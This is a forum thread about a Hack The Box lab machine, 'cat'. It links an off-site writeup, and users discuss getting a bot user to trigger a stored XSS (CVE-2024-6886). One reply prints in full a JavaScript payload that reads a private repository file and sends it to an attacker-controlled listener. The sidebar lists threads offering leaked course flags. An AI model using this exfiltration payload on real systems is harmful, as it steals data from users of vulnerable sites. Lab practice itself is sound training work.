cat Linux Medium writeup
by RedBlock - Sunday February 2, 2025 at 07:17 PM
#1
https://mega.nz/file/QBYSFYzb#ebALkYFVUy...Kl9iu-nQso
Hack the Box Season 8

https://t.me/+u1sCX38Xneo3OGM1
Reply
#2
This is the tutorial I needed, even though I'm just starting to do it now Smile a good machine, just based on basic flaws, it can do a lesson of average difficulty
Reply
#3
wow thank you so much for the write-up, I’m stuck at the root of the privilege escalation and have no idea what to do next
Reply
#4
So what are the conditions for 'Jobert' to click the link? I tested this various ways and couldn't understand why sometimes I would get a response to my python server and other times I would get nothing even after inserting the exact XSS payload in the description. Is it the machines cron job schedule of sendmail? It doesn't appear to be executing immediately? Or am I missing something?
Reply
#5
I can't say for certain, but I had a lot more luck spamming jobert from the victim box vs. my Kali box. (Like I got ONE *bad* hit from my kali box, but repeated success from victim).
Reply
#6
(Feb 08, 2025, 08:57 PM)bobthebuilder1111 Wrote: I can't say for certain, but I had a lot more luck spamming jobert from the victim box vs. my Kali box.  (Like I got ONE *bad* hit from my kali box, but repeated success from victim).

So I reset the box and the XSS payload that worked this time was this one. (in the description box per CVE-2024-6886)

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response=>response.text()).then(data=>fetch('http://10.10.16.2:8888/?response='+encodeURIComponent(data))).catch(error=>console.error('Error:', error));">lol</a>

I didn't have to create an empty file as a previous post recommended. This payload in the repo description box is enough to get a call back to your listening server.
I think the box may be unstable and may need a reset if the jobert user is not 'clicking' on the link. But you're right. I think you have to spam jobert. Sent it 16 times after resetting the box and indeed got back 16 responses.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 31 2,942 38 minutes ago
Last Post: hwzus47431
  CBBH Write Ups hiddenhacker 24 6,446 1 hour ago
Last Post: reze
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 12 689 1 hour ago
Last Post: 69420
  [FREE] CPTS 12 FLAGS pulsebreaker 77 2,516 1 hour ago
Last Post: reze
  HTB Eloquia User and Root Flags - Insane Box 69646B 14 522 1 hour ago
Last Post: zamizamo

Forum Jump:


 Users browsing this forum: 1 Guest(s)